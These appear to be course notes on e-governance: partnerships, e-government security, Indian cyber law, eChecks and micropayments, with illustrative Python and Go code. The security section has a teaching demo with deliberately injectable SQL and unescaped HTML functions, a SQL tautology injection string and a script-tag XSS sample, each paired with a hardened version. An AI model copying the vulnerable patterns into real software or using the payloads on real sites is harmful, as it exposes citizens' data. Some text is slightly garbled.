
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition - For and In the Market


The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time, money, expertise, people)

Shared risks

Shared benefits

Benefits:

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program, Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, with the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication - the capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.

Authorization - the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality - the capability to prevent unauthorized access to information.

Integrity - the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability - the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation - the capability to prevent a person or system intervening in an event or action from denying or challenging their participation in the event.
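As an added illustration (not part of the course notes), the following Python sketch puts these requirements into one small citizen-service handler: a PBKDF2 check for authentication, a role policy for authorization and confidentiality, and an HMAC-chained audit trail for integrity and traceability. The users, secrets, roles, records and the log key are constructed sample data; true non-repudiation would additionally need per-user digital signatures, which this stdlib-only sketch does not provide.

```python
import hashlib
import hmac
import json
from typing import Dict, List, Optional, Tuple

# Constructed role policy: which actions each role may perform (authorization).
POLICY = {
    "citizen": {"view_record"},
    "clerk": {"view_record", "update_record"},
}
SALT = b"constructed-demo-salt"  # a real system uses a random per-user salt


def hash_secret(secret: str, salt: bytes = SALT) -> bytes:
    """Slow password hash; the plaintext secret is never stored."""
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 50_000)


class AuditLog:
    """Traceability and integrity: every action is recorded in order, and each
    entry carries a MAC over its content plus the previous entry's MAC, so an
    after-the-fact edit or deletion breaks the chain."""

    def __init__(self, key: bytes):
        self._key = key
        self.entries: List[dict] = []

    def _mac(self, entry: dict) -> str:
        body = json.dumps(entry, sort_keys=True).encode()
        return hmac.new(self._key, body, hashlib.sha256).hexdigest()

    def append(self, actor: str, action: str, resource: str, outcome: str) -> None:
        prev = self.entries[-1]["mac"] if self.entries else "0" * 64
        entry = {"seq": len(self.entries), "actor": actor, "action": action,
                 "resource": resource, "outcome": outcome, "prev": prev}
        entry["mac"] = self._mac(entry)
        self.entries.append(entry)

    def first_tampered(self) -> int:
        """Index of the first entry whose MAC or chain link is wrong, or -1."""
        prev = "0" * 64
        for i, e in enumerate(self.entries):
            unsigned = {k: v for k, v in e.items() if k != "mac"}
            if e["prev"] != prev or not hmac.compare_digest(self._mac(unsigned), e["mac"]):
                return i
            prev = e["mac"]
        return -1


class CitizenService:
    def __init__(self, users: Dict[str, Tuple[str, bytes]],
                 records: Dict[str, str], log: AuditLog):
        self.users = users        # name -> (role, hashed secret)
        self.records = records    # citizen name -> record text
        self.log = log

    def _authenticate(self, user: str, secret: str) -> bool:
        stored = self.users.get(user)
        if stored is None:
            hash_secret(secret)   # same cost for unknown users: no timing leak
            return False
        return hmac.compare_digest(hash_secret(secret), stored[1])

    def handle(self, user: str, secret: str, action: str, target: str,
               new_value: Optional[str] = None) -> Optional[str]:
        """Returns the record on success, None on any denial; every attempt is logged."""
        if not self._authenticate(user, secret):
            self.log.append(user, action, target, "denied:authentication")
            return None
        role = self.users[user][0]
        allowed = action in POLICY.get(role, set())
        # Confidentiality: a citizen may only reach their own record.
        if role == "citizen" and target != user:
            allowed = False
        if not allowed:
            self.log.append(user, action, target, "denied:authorization")
            return None
        if action == "update_record":
            self.records[target] = new_value or ""
        self.log.append(user, action, target, "ok")
        return self.records.get(target)


def demo() -> Tuple[List[Optional[str]], int, int]:
    """Run four requests, then simulate an edit of a logged denial."""
    log = AuditLog(key=b"constructed-audit-key")
    users = {"asha": ("citizen", hash_secret("asha-pass")),
             "clerk1": ("clerk", hash_secret("clerk-pass"))}
    svc = CitizenService(users, {"asha": "ration card: active"}, log)
    results = [
        svc.handle("asha", "wrong-pass", "view_record", "asha"),          # None
        svc.handle("asha", "asha-pass", "view_record", "asha"),           # record
        svc.handle("asha", "asha-pass", "update_record", "asha", "x"),    # None
        svc.handle("clerk1", "clerk-pass", "update_record", "asha",
                   "ration card: renewed"),                               # new record
    ]
    before = log.first_tampered()            # -1: chain intact
    log.entries[2]["outcome"] = "ok"         # someone "cleans up" the denial
    return results, before, log.first_tampered()   # the edit is caught at index 2


if __name__ == "__main__":
    print(demo())
```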

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constituting a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks include techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness

Continually improve its control environment

Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
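As an added example that is not from the course notes, here is an applicant-status lookup written first with string-built SQL and unescaped HTML (the two weaknesses named above), then hardened with an allow-list, bound parameters and output encoding; the table, its rows and the stored `<script>` sample are constructed.

```python
import html
import re
import sqlite3
from typing import List, Tuple

# Constructed sample table of application statuses.
SAMPLE_ROWS = [("asha", "approved"), ("ravi", "pending"), ("meera", "rejected")]
APPLICANT_ID = re.compile(r"[a-z0-9_]{1,32}")   # constructed allow-list for IDs


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE applications (applicant TEXT, status TEXT)")
    conn.executemany("INSERT INTO applications VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, applicant: str) -> List[Tuple[str, str]]:
    # The request value is pasted into the SQL text, so quotes in it change the query.
    sql = f"SELECT applicant, status FROM applications WHERE applicant = '{applicant}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, applicant: str) -> List[Tuple[str, str]]:
    # Allow-list first, then bind the value as a parameter: it can never become SQL.
    if not APPLICANT_ID.fullmatch(applicant):
        return []
    return conn.execute(
        "SELECT applicant, status FROM applications WHERE applicant = ?", (applicant,)
    ).fetchall()


def render_vulnerable(rows: List[Tuple[str, str]]) -> str:
    # Values go into the page unescaped: a stored <script> tag would execute in the browser.
    return "".join(f"<li>{a}: {s}</li>" for a, s in rows)


def render_safe(rows: List[Tuple[str, str]]) -> str:
    # Output encoding appropriate for HTML text nodes.
    return "".join(f"<li>{html.escape(a)}: {html.escape(s)}</li>" for a, s in rows)


def demo() -> dict:
    conn = build_db()
    tautology = "nobody' OR '1'='1"                 # classic always-true tail
    stored = [("<script>alert(1)</script>", "pending")]   # constructed stored value
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, tautology)),  # 3: whole table leaks
        "safe_rows": len(lookup_safe(conn, tautology)),              # 0: rejected, then bound
        "normal_rows": len(lookup_safe(conn, "ravi")),               # 1: legitimate lookup
        "vulnerable_html": render_vulnerable(stored),
        "safe_html": render_safe(stored),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```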

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever without permission of the owner of the computer:

Secures access;

Downloads, copies or extracts any data, computer database or any information;

Introduces or causes to be introduced any virus or contaminant;

Disrupts or causes disruption;

Denies or causes denial of access to any person;

Provides any assistance to any person to facilitate access;

Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

any information that is grossly offensive or has menacing character; or

any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences -

Section 65 - Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years and/or fine up to 2 lakh rupees.

Section 66 - Hacking. Punishment: imprisonment up to three years and/or fine up to 5 lakh rupees.

Section 66-A - Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money - and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider

How does the ACH Network work with eChecks

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster: clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately and electronically through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service.

1. Payer (customer/bill payer) is prompted to authorize electronic debit, enter bank routing number (ABA) and account number.


2. Merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards bank routing number and account number to processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. Processor forwards approve/decline results to CyberSource.

5. CyberSource returns approval/decline message to merchant.

6. If approved, CyberSource routes check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
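As an added example (not code from the page, from CyberSource or from any processor), the Go program below puts together three of the checks described above: the ABA routing-number checksum behind the validation in step 4, the digital signature that authenticates the payer and exposes tampering (the private key signs, the public key verifies), and duplicate detection of a check presented twice. The record layout, the Processor type and the routing number 123456780 are constructed for this example and are not a real eCheck format.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// ECheck is a constructed record of one electronic check conversion.
// The field layout is an assumption for this example, not a real format.
type ECheck struct {
	Routing string // 9-digit ABA routing number
	Account string // payer's account number
	Cents   int64  // payment amount in cents
	Ref     string // merchant reference, e.g. the paper check number
}

// ValidRouting applies the ABA routing-number checksum: the weights 3,7,1
// repeat across the nine digits and the weighted sum must be divisible by 10.
func ValidRouting(r string) bool {
	if len(r) != 9 {
		return false
	}
	weights := [3]int{3, 7, 1}
	sum := 0
	for i := 0; i < 9; i++ {
		c := r[i]
		if c < '0' || c > '9' {
			return false
		}
		sum += int(c-'0') * weights[i%3]
	}
	return sum%10 == 0
}

// canonical returns the bytes that are signed and fingerprinted; any change
// to amount, account or reference changes these bytes.
func (e ECheck) canonical() []byte {
	return []byte(fmt.Sprintf("%s|%s|%d|%s", e.Routing, e.Account, e.Cents, e.Ref))
}

// NewKeyPair creates the payer's key pair: the private key signs, the public
// key is handed to anyone who must verify the signature.
func NewKeyPair() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err) // only fails if the OS random source is unavailable
	}
	return pub, priv
}

// Sign produces the digital signature on the eCheck with the private key.
func Sign(priv ed25519.PrivateKey, e ECheck) []byte {
	return ed25519.Sign(priv, e.canonical())
}

var (
	ErrRouting   = errors.New("routing number fails ABA checksum")
	ErrSignature = errors.New("signature does not verify: wrong signer or tampered")
	ErrDuplicate = errors.New("duplicate presentment of the same check")
)

// Processor stands in for the processor of steps 4 and 5: it validates the
// routing number, verifies the signature and rejects duplicate presentments.
type Processor struct {
	seen map[string]bool // fingerprints of checks already accepted
}

func NewProcessor() *Processor {
	return &Processor{seen: make(map[string]bool)}
}

// Accept returns nil for an approved check or one of the errors above.
func (p *Processor) Accept(pub ed25519.PublicKey, e ECheck, sig []byte) error {
	if !ValidRouting(e.Routing) {
		return ErrRouting
	}
	if !ed25519.Verify(pub, e.canonical(), sig) {
		return ErrSignature
	}
	fp := sha256.Sum256(e.canonical())
	key := hex.EncodeToString(fp[:])
	if p.seen[key] {
		return ErrDuplicate
	}
	p.seen[key] = true
	return nil
}

func main() {
	pub, priv := NewKeyPair()
	p := NewProcessor()
	// Constructed sample: routing number 123456780 satisfies the checksum.
	chk := ECheck{Routing: "123456780", Account: "000123456", Cents: 4250, Ref: "1042"}
	sig := Sign(priv, chk)
	fmt.Println("first presentment:", p.Accept(pub, chk, sig))  // <nil>
	fmt.Println("second presentment:", p.Accept(pub, chk, sig)) // duplicate
	chk.Cents = 425000                                           // tamper with amount
	fmt.Println("tampered amount:", p.Accept(pub, chk, sig))     // signature fails
}
```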

Four Different Scenarios of the FSTC E-check System -


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)

PayWord (post-payment)


MICROPAYMENT IS -

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

Alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
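PayWord, named above as a post-payment method, is the classic example of micropayments that accumulate until they are settled as one larger payment. The page does not describe how it works, so the Go program below is an added example (not code from the page, nor from PayWord's authors) of the hash-chain mechanism from the published PayWord design: the payer commits to the root of a hash chain, each micropayment reveals the next link, the vendor verifies offline against the previous link only, and the broker settles the accumulated count as a single charge. The signed commitment and the broker-issued certificate of the real scheme are omitted; the type and function names are this example's own.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// hash is the one-way function H of the scheme.
func hash(b []byte) []byte {
	h := sha256.Sum256(b)
	return h[:]
}

// Chain is the payer's side: w_n is a random seed, w_i = H(w_{i+1}), and the
// root w_0 is the commitment given to the vendor (PayWord signs it; omitted here).
type Chain struct {
	words [][]byte // words[i] = w_i for i = 0..n
	next  int      // index of the next unspent payword
}

func NewChain(n int) (*Chain, error) {
	seed := make([]byte, 32)
	if _, err := rand.Read(seed); err != nil {
		return nil, err
	}
	words := make([][]byte, n+1)
	words[n] = seed
	for i := n - 1; i >= 0; i-- {
		words[i] = hash(words[i+1])
	}
	return &Chain{words: words, next: 1}, nil
}

func (c *Chain) Root() []byte { return c.words[0] }

// Pay spends `units` at once by revealing w_{next+units-1}; ok is false if the
// chain would be overspent.
func (c *Chain) Pay(units int) (word []byte, index int, ok bool) {
	if units < 1 || c.next+units-1 >= len(c.words) {
		return nil, 0, false
	}
	index = c.next + units - 1
	c.next = index + 1
	return c.words[index], index, true
}

// Vendor verifies each payment offline against the last accepted payword only.
type Vendor struct {
	n     int    // chain length agreed in the commitment
	Last  []byte // last accepted payword, initially the root
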